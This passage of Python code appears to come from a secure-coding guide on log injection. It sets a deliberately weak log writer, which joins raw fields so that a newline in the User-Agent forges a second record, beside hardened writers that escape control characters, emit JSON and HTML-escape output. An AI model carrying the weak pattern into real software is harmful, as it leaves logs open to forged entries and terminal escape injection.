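def naive_log_entry(ts, client_ip, page, user_agent, message):
    """The weak pattern the Log Injection section exploits: raw fields joined by spaces.
    A newline inside user_agent yields two records when the file is read back."""
    return '{} {} {} "{}" {}'.format(ts, client_ip, page, user_agent, message)


def encode_log_field(value):
    """Rewrite control characters as \\xNN escapes so the field stays on one line and
    cannot inject terminal escape sequences at whoever tails the file."""
    return _CONTROL_RE.sub(lambda m: "\\x{:02x}".format(ord(m.group(0))), value)


def write_log_entry(ts, client_ip, page, user_agent, message):
    """Hardened writer: one JSON object per line. Field boundaries come from the
    encoder, not from spaces or newlines in the data."""
    record = {"ts": ts, "ip": client_ip, "page": page,
              "ua": encode_log_field(user_agent), "msg": encode_log_field(message)}
    return json.dumps(record, ensure_ascii=True)


def read_log_entry(line):
    """Parse one stored line back into its fields."""
    return json.loads(line)


def render_log_line_html(line):
    """Render a stored line as a table row for a web-based viewer. Output encoding
    happens here, at the point of use, regardless of what the writer did."""
    record = read_log_entry(line)
    cells = "".join("<td>{}</td>".format(html.escape(str(record[k]), quote=True))
                    for k in ("ts", "ip", "page", "ua", "msg"))
    return "<tr>{}</tr>".format(cells)


def demo():
    """Write one entry with the hostile User-Agent and render it; returns (line, html_row)."""
    line = write_log_entry("2011-01-15 10:02:11", "192.168.56.1", "index.php", HOSTILE_UA, "page view")
    return line, render_log_line_html(line)


if __name__ == "__main__":
    print("naive record count:",
          naive_log_entry("2011-01-15 10:02:11", "192.168.56.1", "index.php", HOSTILE_UA, "page view").count("\n") + 1)
    line, row = demo()
    print(line)
    print(row)
```

Encoding at write time and again at render time are separate controls: the first protects every consumer of the file (grep, tail, a SIEM parser), the second protects the browser viewing it, and neither one substitutes for the other.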